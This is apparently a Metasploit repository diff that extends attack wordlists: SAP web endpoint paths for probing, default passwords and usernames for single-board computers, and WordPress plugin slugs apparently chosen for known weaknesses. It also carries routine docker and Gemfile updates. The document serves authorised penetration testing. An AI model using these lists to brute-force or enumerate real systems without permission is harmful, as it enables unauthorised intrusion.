+sap/bc/srt/sap/SRT_TESTS_FB_ADD_WS
+sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST01_WS
+sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST02_WS
+sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST03_WS
+sap/bc/srt/sap/SRT_TESTS_FB_SUM_WS
+sap/bc/srt/sap/SXIDAL_FLIGHTSEATAVAIL_CHECK
+sap/bc/srt/sap/SYNCCALLSECURITYHIGHNOAUTOGEN
+sap/bc/srt/sap/SYNCCALLSECURITYLOWAUTOGEN
+sap/bc/srt/sap/TEST_WEBSERVICE_WRITE
+sap/bc/srt/sap/WDYBUILDINBOX
+sap/bc/srt/sap/WDYGETDC
+sap/bc/srt/sap/WDYGETTF
+sap/bc/srt/sap/WDYSETDC
+sap/bc/srt/sap/WDYUPDATETF
+sap/bc/srt/sap/WS_ORDER_BE_IN
+sap/bc/srt/sap/ob_wsd_test02
+sap/bc/srt/sap/xmla
+sap/bc/srt/wsil
+sap/bc/srt/xip
+sap/bc/srt/xip/sap
+sap/bc/testzone
+sap/bc/testzone/
+sap/bc/testzone/depot_select
+sap/bc/testzone/result_rep
+sap/bc/verification/
+sap/bc/verification/itsplugin
+sap/bc/verification/stateful_ping
+sap/bc/wappush
+sap/bc/wd_trace_tool
+sap/bc/wdvd
+sap/bc/webapp
+sap/bc/webdynpro
+sap/bc/webdynpro/sap
+sap/bc/webdynpro/sap/
+sap/bc/webdynpro/sap/CCMSBI_WAST_EXTR_TESTENV
+sap/bc/webdynpro/sap/CNP_LIGHT_TEST
+sap/bc/webdynpro/sap/DBA_COCKPIT
+sap/bc/webdynpro/sap/DEMO_CONTEXT_CHANGES
+sap/bc/webdynpro/sap/DEMO_ROADMAP
+sap/bc/webdynpro/sap/DEMO_SIMPLE_MAIN
+sap/bc/webdynpro/sap/DEMO_TABLE
+sap/bc/webdynpro/sap/DEMO_TABLE_WITH_TREE_BY_KEY
+sap/bc/webdynpro/sap/DEMO_TABLE_WITH_TREE_BY_NST
+sap/bc/webdynpro/sap/DemoDynamic
+sap/bc/webdynpro/sap/DemoTree
+sap/bc/webdynpro/sap/EXAMPLE_WDABAP_3
+sap/bc/webdynpro/sap/KEY_FIGURE_MONITOR
+sap/bc/webdynpro/sap/KEY_FIGURE_TREND
+sap/bc/webdynpro/sap/MASTERMIND
+sap/bc/webdynpro/sap/OTHELLO
+sap/bc/webdynpro/sap/POWL
+sap/bc/webdynpro/sap/POWL_COLLECTOR
+sap/bc/webdynpro/sap/POWL_MASTER_QUERY
+sap/bc/webdynpro/sap/POWL_PERS_COMP
+sap/bc/webdynpro/sap/RCM_DOC_CLIENT_test
+sap/bc/webdynpro/sap/RCM_ORGANIZER
+sap/bc/webdynpro/sap/RCM_RECORD
+sap/bc/webdynpro/sap/RCM_SP
+sap/bc/webdynpro/sap/RCM_SP_URL
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_ALVFNC
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_COLORS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_COLSCR
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_CV
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_EDIT
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_EVENTS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_F4
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_MIG
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_PARTS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_PROPS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_SIMPLE
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TOL
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TOOLBR
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TREE
+sap/bc/webdynpro/sap/SALV_WD_TEST_DATA
+sap/bc/webdynpro/sap/SALV_WD_TEST_DATA_DOWNLOAD
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_ALVFNC
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_COLORS
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_COLSCR
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_CV
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EDIT
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EDIT_M
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EVENTS
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_IN_WDW
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_PROPS
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_SELECT
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_SIMPLE
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_TOOLBR
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_TREE
+sap/bc/webdynpro/sap/TEST_BAD_LINK
+sap/bc/webdynpro/sap/TEST_MODIFY_VIEW
+sap/bc/webdynpro/sap/TEST_RUNTIME_REPOSITORY
+sap/bc/webdynpro/sap/TestUpload
+sap/bc/webdynpro/sap/WDK_A_SE91
+sap/bc/webdynpro/sap/WDK_SPOOL_TO_PDF
+sap/bc/webdynpro/sap/WDR_DOCU_HELPER
+sap/bc/webdynpro/sap/WDR_MESSAGE_AREA
+sap/bc/webdynpro/sap/WDR_TEST_ADOBE
+sap/bc/webdynpro/sap/WDR_TEST_DDIC_SHLP
+sap/bc/webdynpro/sap/WDR_TEST_DOCU
+sap/bc/webdynpro/sap/WDR_TEST_EVENTS
+sap/bc/webdynpro/sap/WDR_TEST_ICON_SOURCES
+sap/bc/webdynpro/sap/WDR_TEST_IT05
+sap/bc/webdynpro/sap/WDR_TEST_JNDI_PROVIDER
+sap/bc/webdynpro/sap/WDR_TEST_LAYOUTS
+sap/bc/webdynpro/sap/WDR_TEST_MODIFY_VIEW
+sap/bc/webdynpro/sap/WDR_TEST_NAVIGATION
+sap/bc/webdynpro/sap/WDR_TEST_OVS
+sap/bc/webdynpro/sap/WDR_TEST_P00001
+sap/bc/webdynpro/sap/WDR_TEST_P00002
+sap/bc/webdynpro/sap/WDR_TEST_P00003
+sap/bc/webdynpro/sap/WDR_TEST_P13N
+sap/bc/webdynpro/sap/WDR_TEST_POPUPS
+sap/bc/webdynpro/sap/WDR_TEST_POPUPS_RT
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE2
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE_POP
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC2
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC_POP
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_OBN
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_PAGE
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_TARGET
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_POPUP
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_WS
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_WS_IN
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_WORKPROTECT
+sap/bc/webdynpro/sap/WDR_TEST_RUNTIME
+sap/bc/webdynpro/sap/WDR_TEST_TABLE
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_CHILD
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_CLOSE
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_LOGOFF
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_RESUME
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUITE
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUSRES_A
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUSRES_B
+sap/bc/webdynpro/sap/WDR_UIE_LIBRARY
+sap/bc/webdynpro/sap/apb_launchpad
+sap/bc/webdynpro/sap/apb_launchpad_nwbc
+sap/bc/webdynpro/sap/apb_lpd_light_start
+sap/bc/webdynpro/sap/apb_lpd_start_url
+sap/bc/webdynpro/sap/appl_log_trc_viewer
+sap/bc/webdynpro/sap/appl_soap_management
+sap/bc/webdynpro/sap/application_exit
+sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
+sap/bc/webdynpro/sap/cnp_light_test
+sap/bc/webdynpro/sap/configure_application
+sap/bc/webdynpro/sap/configure_component
+sap/bc/webdynpro/sap/demo_messages
+sap/bc/webdynpro/sap/demo_messages2
+sap/bc/webdynpro/sap/demo_variable_dropdown
+sap/bc/webdynpro/sap/demo_wda_quiz
+sap/bc/webdynpro/sap/demo_wda_table
+sap/bc/webdynpro/sap/esh_adm_smoketest_ui
+sap/bc/webdynpro/sap/esh_admin_ui_component
+sap/bc/webdynpro/sap/esh_eng_modelling
+sap/bc/webdynpro/sap/esh_search_results.ui
+sap/bc/webdynpro/sap/ios_test_helloworld_ms
+sap/bc/webdynpro/sap/ios_test_helloworld_so
+sap/bc/webdynpro/sap/ios_test_simple_ms
+sap/bc/webdynpro/sap/ios_test_simple_so
+sap/bc/webdynpro/sap/its
+sap/bc/webdynpro/sap/powl_test_feeder
+sap/bc/webdynpro/sap/ptm_assign_s_ui
+sap/bc/webdynpro/sap/ptm_jf_worklist_ui
+sap/bc/webdynpro/sap/ptm_maintain_jf_ui
+sap/bc/webdynpro/sap/rcm_multistring_edit_example
+sap/bc/webdynpro/sap/rcm_poid_info_example
+sap/bc/webdynpro/sap/rcm_property_query_example
+sap/bc/webdynpro/sap/salv_wd_demo_table_dfault
+sap/bc/webdynpro/sap/salv_wd_submit
+sap/bc/webdynpro/sap/salv_wd_test_col_field
+sap/bc/webdynpro/sap/salv_wd_test_conf_caller
+sap/bc/webdynpro/sap/salv_wd_test_config1
+sap/bc/webdynpro/sap/salv_wd_test_config_api
+sap/bc/webdynpro/sap/salv_wd_test_config_api2
+sap/bc/webdynpro/sap/salv_wd_test_datatypes
+sap/bc/webdynpro/sap/salv_wd_test_dyn1
+sap/bc/webdynpro/sap/salv_wd_test_extended
+sap/bc/webdynpro/sap/salv_wd_test_file_upload
+sap/bc/webdynpro/sap/salv_wd_test_image1
+sap/bc/webdynpro/sap/salv_wd_test_modif1
+sap/bc/webdynpro/sap/salv_wd_test_no_ddic
+sap/bc/webdynpro/sap/salv_wd_test_non_portal
+sap/bc/webdynpro/sap/salv_wd_test_set_data
+sap/bc/webdynpro/sap/salv_wd_test_set_data1
+sap/bc/webdynpro/sap/salv_wd_test_simple1
+sap/bc/webdynpro/sap/salv_wd_test_table_edit2
+sap/bc/webdynpro/sap/salv_wd_test_table_f4
+sap/bc/webdynpro/sap/salv_wd_test_table_tol
+sap/bc/webdynpro/sap/salv_wd_test_table_tol2
+sap/bc/webdynpro/sap/salv_wd_test_translation
+sap/bc/webdynpro/sap/sh_adm_smoketest_files
+sap/bc/webdynpro/sap/test_ddic
+sap/bc/webdynpro/sap/wd_analyze_config_appl
+sap/bc/webdynpro/sap/wd_analyze_config_comp
+sap/bc/webdynpro/sap/wd_analyze_config_default
+sap/bc/webdynpro/sap/wd_analyze_config_user
+sap/bc/webdynpro/sap/wd_layout_cnp_light
+sap/bc/webdynpro/sap/wd_personalize_ddic_valuehelp
+sap/bc/webdynpro/sap/wd_tut_alv
+sap/bc/webdynpro/sap/wd_tut_componentdetail
+sap/bc/webdynpro/sap/wd_tut_componentusage
+sap/bc/webdynpro/sap/wd_tut_dialogboxes
+sap/bc/webdynpro/sap/wdhc_application
+sap/bc/webdynpro/sap/wdk_gaf_template
+sap/bc/webdynpro/sap/wdk_oif_template
+sap/bc/webdynpro/sap/wdk_qaf_template
+sap/bc/webdynpro/sap/wdr_inplace_demo1
+sap/bc/webdynpro/sap/wdr_inplace_demo2
+sap/bc/webdynpro/sap/wdr_ovs_test
+sap/bc/webdynpro/sap/wdr_package_srvs
+sap/bc/webdynpro/sap/wdr_popup_to_confirm_test
+sap/bc/webdynpro/sap/wdr_replace_if_wdl
+sap/bc/webdynpro/sap/wdr_test_adobe_pdf_only
+sap/bc/webdynpro/sap/wdr_test_appl_def_vh
+sap/bc/webdynpro/sap/wdr_test_application_api
+sap/bc/webdynpro/sap/wdr_test_bg_blend
+sap/bc/webdynpro/sap/wdr_test_chat
+sap/bc/webdynpro/sap/wdr_test_cmp_usage_group
+sap/bc/webdynpro/sap/wdr_test_cmpusage
+sap/bc/webdynpro/sap/wdr_test_cmpusage4
+sap/bc/webdynpro/sap/wdr_test_config
+sap/bc/webdynpro/sap/wdr_test_config2
+sap/bc/webdynpro/sap/wdr_test_configmain
+sap/bc/webdynpro/sap/wdr_test_context
+sap/bc/webdynpro/sap/wdr_test_dynamic
+sap/bc/webdynpro/sap/wdr_test_enhancements
+sap/bc/webdynpro/sap/wdr_test_exit_plug
+sap/bc/webdynpro/sap/wdr_test_ext_mapping
+sap/bc/webdynpro/sap/wdr_test_extended_path
+sap/bc/webdynpro/sap/wdr_test_gantt
+sap/bc/webdynpro/sap/wdr_test_global_settings
+sap/bc/webdynpro/sap/wdr_test_help
+sap/bc/webdynpro/sap/wdr_test_input
+sap/bc/webdynpro/sap/wdr_test_it05_nopatt
+sap/bc/webdynpro/sap/wdr_test_mailto
+sap/bc/webdynpro/sap/wdr_test_mandatory
+sap/bc/webdynpro/sap/wdr_test_misc
+sap/bc/webdynpro/sap/wdr_test_msg_manager_00
+sap/bc/webdynpro/sap/wdr_test_navigation6
+sap/bc/webdynpro/sap/wdr_test_navigation7
+sap/bc/webdynpro/sap/wdr_test_navigation_00
+sap/bc/webdynpro/sap/wdr_test_ovs2
+sap/bc/webdynpro/sap/wdr_test_p00004
+sap/bc/webdynpro/sap/wdr_test_p00006
+sap/bc/webdynpro/sap/wdr_test_p00007
+sap/bc/webdynpro/sap/wdr_test_p00008
+sap/bc/webdynpro/sap/wdr_test_p00009
+sap/bc/webdynpro/sap/wdr_test_p00010
+sap/bc/webdynpro/sap/wdr_test_p00011
+sap/bc/webdynpro/sap/wdr_test_paddless_window
+sap/bc/webdynpro/sap/wdr_test_pers_imp
+sap/bc/webdynpro/sap/wdr_test_pers_imp_exp
+sap/bc/webdynpro/sap/wdr_test_popup_01
+sap/bc/webdynpro/sap/wdr_test_popup_inplug
+sap/bc/webdynpro/sap/wdr_test_popup_to_confirm
+sap/bc/webdynpro/sap/wdr_test_popups_rt
+sap/bc/webdynpro/sap/wdr_test_popups_rt_00
+sap/bc/webdynpro/sap/wdr_test_select_options
+sap/bc/webdynpro/sap/wdr_test_ui_elements
+sap/bc/webdynpro/sap/wdr_test_ur_browser
+sap/bc/webdynpro/sap/wdr_transport_srvs
+sap/bc/webdynpro/sap/wdt_alv
+sap/bc/webdynpro/sap/wdt_bg_scatter
+sap/bc/webdynpro/sap/wdt_componentdetail
+sap/bc/webdynpro/sap/wdt_componentusage
+sap/bc/webdynpro/sap/wdt_dialogboxes
+sap/bc/webdynpro/sap/wdt_ext_map_reuse
+sap/bc/webdynpro/sap/wdt_flightlist
+sap/bc/webdynpro/sap/wdt_master_detail
+sap/bc/webdynpro/sap/wdt_quiz
+sap/bc/webdynpro/sap/wdt_table
+sap/bc/webdynpro/sap/wdt_tree
+sap/bc/webdynpro/sap/wdt_tree_table_by_key
+sap/bc/webflow
+sap/bc/webflow/
+sap/bc/webflow/demo
+sap/bc/webflow/demo/
+sap/bc/webflow/demo/trareq_update
+sap/bc/webflow/demo/wf_demo_calc_01
+sap/bc/webflow/test
+sap/bc/webflow/test/
+sap/bc/webflow/test/get_data
+sap/bc/webflow/test/inc_async
+sap/bc/webflow/test/inc_sync
+sap/bc/webflow/test/test_datatypes
+sap/bc/webflow/test/test_get_xml
+sap/bc/webflow/test/test_show_xml
+sap/bc/webflow/wshandler
+sap/bc/webrfc
+sap/bc/workflow
+sap/bc/workflow/
+sap/bc/workflow/shortcut
+sap/bc/workflow/workflow_api
+sap/bc/workflow_xml
+sap/bc/xmb
+sap/bc/xml
+sap/bc/xmsmsg
+sap/bc/xrfc
+sap/bc/xrfc_test
+sap/bw
+sap/ca
+sap/ca/att_provide
+sap/crm
+sap/es/cockpit
+sap/es/getdocument
+sap/es/opensearch
+sap/es/opensearch/description
+sap/es/opensearch/list
+sap/es/opensearch/search
+sap/es/redirect
+sap/es/saplink
+sap/es/search
+sap/icm/admin
+sap/meData
+sap/monitoring
+sap/monitoring/
+sap/monitoring/ComponentInfo
+sap/monitoring/SystemInfo
+sap/option
+sap/public
+sap/public/
+sap/public/bc
+sap/public/bc/
+sap/public/bc/NWDEMO_MODEL
+sap/public/bc/NW_ESH_TST_AUTO
+sap/public/bc/icons
+sap/public/bc/icons_rtl
+sap/public/bc/its
+sap/public/bc/its/
+sap/public/bc/its/designs
+sap/public/bc/its/mimes
+sap/public/bc/its/mimes/system/SL/page/hourglass.html
+sap/public/bc/its/mobile/itsmobile00
+sap/public/bc/its/mobile/itsmobile01
+sap/public/bc/its/mobile/rfid
+sap/public/bc/its/mobile/start
+sap/public/bc/its/mobile/test
+sap/public/bc/pictograms
+sap/public/bc/sicf_login_run
+sap/public/bc/trex
+sap/public/bc/ur
+sap/public/bc/wdtracetool
+sap/public/bc/webdynpro
+sap/public/bc/webdynpro/
+sap/public/bc/webdynpro/ViewDesigner
+sap/public/bc/webdynpro/adobeChallenge
+sap/public/bc/webdynpro/adobechallenge
+sap/public/bc/webdynpro/mimes
+sap/public/bc/webdynpro/ssr
+sap/public/bc/webdynpro/viewdesigner
+sap/public/bc/webicons
+sap/public/bc/workflow
+sap/public/bc/workflow/shortcut
+sap/public/bsp
+sap/public/bsp/sap
+sap/public/bsp/sap/
+sap/public/bsp/sap/htmlb
+sap/public/bsp/sap/public
+sap/public/bsp/sap/public/
+sap/public/bsp/sap/public/ISE
+sap/public/bsp/sap/public/bc
+sap/public/bsp/sap/public/faa
+sap/public/bsp/sap/public/graphics
+sap/public/bsp/sap/public/graphics/
+sap/public/bsp/sap/public/graphics/jnet_handler
+sap/public/bsp/sap/public/graphics/mimes
+sap/public/bsp/sap/system
+sap/public/bsp/sap/system_public
+sap/public/icf_check
+sap/public/icf_info
+sap/public/icf_info/
+sap/public/icf_info/icr_groups
+sap/public/icf_info/icr_urlprefix
+sap/public/icf_info/logon_groups
+sap/public/icf_info/urlprefix
+sap/public/icman
+sap/public/info
+sap/public/myssocntl
+sap/public/ping
+sap/wdvd
+sap/webcuif
+sap/webdynpro/sap/hap_main_document
+sap/webdynpro/sap/hap_start_page_powl_ui_ess
+sap/webdynpro/sap/hap_store_page_powl_ui_mss
+sap/webdynpro/sap/hrtmc_employee_profile
+sap/webdynpro/sap/hrtmc_rm_maintenance
+sap/webdynpro/sap/hrtmc_ta_assessment
+sap/webdynpro/sap/hrtmc_ta_dashboard
+sap/webdynpro/sap/wd_analyze_config_user
+sap/xi
+sap/xi/
+sap/xi/adapter_plain
+sap/xi/cache
+sap/xi/cache_gui
+sap/xi/cache_gui_ssl
+sap/xi/cache_ssl
+sap/xi/docu_apperror
+sap/xi/docu_syserror
+sap/xi/engine
+sap/xi/engine_test
+sap/xi/simulation
+sap/xml/
+sap/xml/cwm
+sap/xml/soap
+sap/xml/soap/xmla
+sap/xml/soap/xmla/fault
+sap_java
+sap_java/bc
+sapmc
+sapmc/sapmc.html
+sapse/startsld
+servlet/com.sap.admin.Critical.Actio
+sim/
+sim/config/testdata.jsp
+sim/config/testerror.jsp
+sim/index.html
+sld
+slm
+slmServices/config
+slmServices/config?wsdl
+slmSolManServices/Config1
+socoview
+socoview/flddisplay.asp
+sp
+spml
+sysconfig
+tc.lm.webadmin.endtoend.public.app
+tc/lm/webadmin/clusteradmin
+teched/test
+test30
+top.html
+uddi
+uddiclient
+uddiclient/jsps/index.jsp
+useradmin
+useradmin/index.jsp
+userhome/
+utl
+vscantest
+vscantest/
+webdynpro
+webdynpro/dispatcher
+webdynpro/dispatcher/sap.com/grc~accvwdcomp
+webdynpro/dispatcher/sap.com/grc~aewebquery
+webdynpro/dispatcher/sap.com/grc~ccappcomp
+webdynpro/dispatcher/sap.com/grc~ccxsysbe
+webdynpro/dispatcher/sap.com/grc~ccxsysbehr
+webdynpro/dispatcher/sap.com/grc~ffappcomp
+webdynpro/dispatcher/sap.com/pb/pagebuilder
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
+webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
+webdynpro/dispatcher/sap.com/tc~lm~webadmin~mainframe~wd/WebAdminApp
+webdynpro/dispatcher/sap.com/tc~sec~ume~wd~enduser/UmeEnduserApp
+webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
+webdynpro/dispatcher/sap.com/tc~wd~tools
+webdynpro/dispatcher/sap.com/tc~wd~tools/Explorer
+webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
+webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
+webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
+webdynpro/resources/sap.com/
+webdynpro/welcome
+webdynpro/welcome/Welcome.jsp
+wsd2wsdl
+wsnavigator
+wsnavigator/enterwsdl.html
+wsnavigator/jsps/redirect.jsp
+wsnavigator/jsps/sendrequest.jsp
+wsnavigator/jsps/test.jsp
+wssproc/cert
+wssproc/plain
+wssproc/ssl
@@ -1007,3 +1007,15 @@ arcsight
 MargaretThatcheris110%SEXY
 karaf
 vagrant
+1234
+milkv
+luckfox
+orangepi
+temppwd
+bianbu
+debian
+starfive
+linaro
+rock
+radxa
+ubuntu
@@ -28,6 +28,7 @@ cups-pk-helper
 daemon
 dbadmin
 dbus
+debian
 Debian-exim
 Debian-snmp
 demo
@@ -65,6 +66,7 @@ landscape
 libstoragemgmt
 libuuid
 lightdm
+linaro
 list
 listen
 lp
@@ -95,6 +97,7 @@ operator
 oracle
 OutOfBox
 pi
+pico
 polkitd
 pollinate
 popr
@@ -104,9 +107,12 @@ postmaster
 printer
 proxy
 pulse
+radxa
 redsocks
 rfindd
+riscv
 rje
+rock
 root
 ROOT
 rooty
@@ -143,6 +149,7 @@ systemd-timesync
 tcpdump
 trouble
 tss
+ubuntu
 udadmin
 ultra
 umountfs
@@ -1,63 +1,70 @@
-wordpress-popular-posts
-backup
-catch-themes-demo-import
-modern-events-calendar-lite
-ninja-forms
-simple-file-list
-sp-client-document-manager
-drag-and-drop-multiple-file-upload-contact-form-7
-wp-file-manager
-duplicator
-work-the-flow-file-upload
 ajax-load-more
-wpdiscuz
-wptouch
-front-end-editor
-wpshop
-plainview-activity-monitor
-sexy-contact-form
+all-in-one-wp-migration
+backup
+backup-backup
+boldgrid-backup
+bookingpress
+bulletproof-security
+catch-themes-demo-import
+chopslider
+custom-registration-form-builder-with-submission-manager
 download-manager
+drag-and-drop-multiple-file-upload-contact-form-7
+dukapress
+duplicator
+duplicator_download
+easy-wp-smtp
+elementor
+email-subscribers
+file-manager-advanced-shortcode
+front-end-editor
+gi-media-library
+give
+hash-form
 inboundio-marketing
-wp-mobile-detector
-website-contact-form-with-file-upload
-slideshow-gallery
-reflex-gallery
-wp-symposium
+learnpress
+loginizer
+masterstudy-lms-learning-management-system
+modern-events-calendar-lite
+modern-events-calendar-lite
+nextgen-gallery
+ninja-forms
+paid-memberships-pro
+perfect-survey
 photo-gallery
 pie-register
-wysija-newsletters
-dzs-zoomsounds
-all-in-one-wp-migration
-wp-ultimate-csv-importer
-wp-symposium
-masterstudy-lms-learning-management-system
-wp-gdpr-compliance
+plainview-activity-monitor
+post-smtp
+really-simple-ssl
+reflex-gallery
+royal-elementor-addons
+secure-copy-content-protection
+sexy-contact-form
+simple-backup
+simple-file-list
+slideshow-gallery
+sp-client-document-manager
+subscribe-to-comments
+ultimate-member
+website-contact-form-with-file-upload
+woocommerce-abandoned-cart
+woocommerce-payments
+wordpress-mobile-pack
+wordpress-popular-posts
+work-the-flow-file-upload
 wp-automatic
 wp-easycart
-dukapress
-loginizer
-email-subscribers
-wps-hide-login
-secure-copy-content-protection
-wordpress-mobile-pack
-learnpress
+wp-fastest-cache
+wp-file-manager
+wp-gdpr-compliance
+wp-mobile-detector
 wp-mobile-edition
-boldgrid-backup
-modern-events-calendar-lite
-gi-media-library
-chopslider
-bulletproof-security
-nextgen-gallery
-simple-backup
-subscribe-to-comments
-easy-wp-smtp
-duplicator_download
-custom-registration-form-builder-with-submission-manager
-woocommerce-abandoned-cart
-elementor
-bookingpress
-paid-memberships-pro
-woocommerce-payments
-file-manager-advanced-shortcode
-royal-elementor-addons
-backup-backup
+wp-symposium
+wp-symposium
+wp-time-capsule
+wp-ultimate-csv-importer
+wpdiscuz
+wps-hide-login
+wpshop
+wptouch
+wysija-newsletters
@@ -1,2 +1,3 @@
+bricks
 holding_pattern
 wplms
@@ -1,2 +1,10 @@
-Contains `modules_metadata_base.json` which contains information about all modules within Metasploit, as well as
-`schema.rb` which describes current state of the database schema maintained by Rails ActiveRecord.
+This directory contains the following files:
+
+- `modules_metadata_base.json`, which contains information about all modules within Metasploit.
+- `schema.rb`, which is auto-generated from the current state of the database schema maintained by Rails ActiveRecord.
+  This file is auto-generated from the current state of the database.
+
+`schema.rb` is the source Rails uses to define your schema when running `bin/rails db:schema:load`. When creating a new 
+database, `bin/rails db:schema:load` tends to be faster and is potentially less error-prone than running all of your 
+migrations from scratch. Old migrations may fail to apply correctly if those migrations use external dependencies or 
+application code. We _strongly_ recommend that you check this file into your version control system.
@@ -1,5 +1,3 @@
-version: '3'
-
 services:
  ms:
    build:
@@ -1,4 +1,3 @@
-version: '3'
 services:
  ms:
    image: metasploitframework/metasploit-framework:latest
@@ -23,8 +23,8 @@ PARAMS="$@"

 if [[ $PARAMS == *"--rebuild"* ]]; then
  echo "Rebuilding image"
-  docker-compose build
+  docker compose build
  exit $?
 fi

-docker-compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
+docker compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
@@ -1 +1 @@
-3.0.5
+3.2.5
@@ -6,6 +6,7 @@ gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
 #gem 'just-the-docs', path: '../../just-the-docs'
 gem 'webrick'
 gem 'rexml'
+gem 'jekyll-sass-converter', '~> 2.2.0'

 group :jekyll_plugins do
  gem 'jekyll-sitemap'
@@ -12,22 +12,22 @@ GIT
 GEM
  remote: https://rubygems.org/
  specs:
-    addressable (2.8.1)
-      public_suffix (>= 2.0.2, < 6.0)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.3.4)
    em-websocket (0.5.3)
      eventmachine (>= 0.12.9)
      http_parser.rb (~> 0)
    eventmachine (1.2.7)
-    ffi (1.15.5)
+    ffi (1.17.0)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.12.0)
+    i18n (1.14.6)
      concurrent-ruby (~> 1.0)
-    jekyll (4.3.1)
+    jekyll (4.3.4)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
@@ -53,44 +53,45 @@ GEM
      jekyll (>= 3.7, < 5.0)
    jekyll-watch (2.2.1)
      listen (~> 3.0)
-    kramdown (2.4.0)
-      rexml
+    kramdown (2.5.1)
+      rexml (>= 3.3.9)
    kramdown-parser-gfm (1.1.0)
      kramdown (~> 2.0)
-    liquid (4.0.3)
-    listen (3.7.1)
+    liquid (4.0.4)
+    listen (3.9.0)
      rb-fsevent (~> 0.10, >= 0.10.3)
      rb-inotify (~> 0.9, >= 0.9.10)
    mercenary (0.4.0)
-    method_source (1.0.0)
+    method_source (1.1.0)
    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
-    pry (0.14.1)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.1)
-    rake (13.0.6)
+    public_suffix (6.0.1)
+    rake (13.2.1)
    rb-fsevent (0.11.2)
-    rb-inotify (0.10.1)
+    rb-inotify (0.11.1)
      ffi (~> 1.0)
-    rexml (3.2.5)
-    rouge (4.0.0)
+    rexml (3.4.0)
+    rouge (4.5.1)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
    terminal-table (3.0.2)
      unicode-display_width (>= 1.1.1, < 3)
-    unicode-display_width (2.3.0)
-    webrick (1.7.0)
+    unicode-display_width (2.6.0)
+    webrick (1.9.1)

 PLATFORMS
  ruby

 DEPENDENCIES
  jekyll (~> 4.3.0)
+  jekyll-sass-converter (~> 2.2.0)
  jekyll-sitemap
  just-the-docs!
  pry-byebug
@@ -101,4 +102,4 @@ DEPENDENCIES
  webrick

 BUNDLED WITH
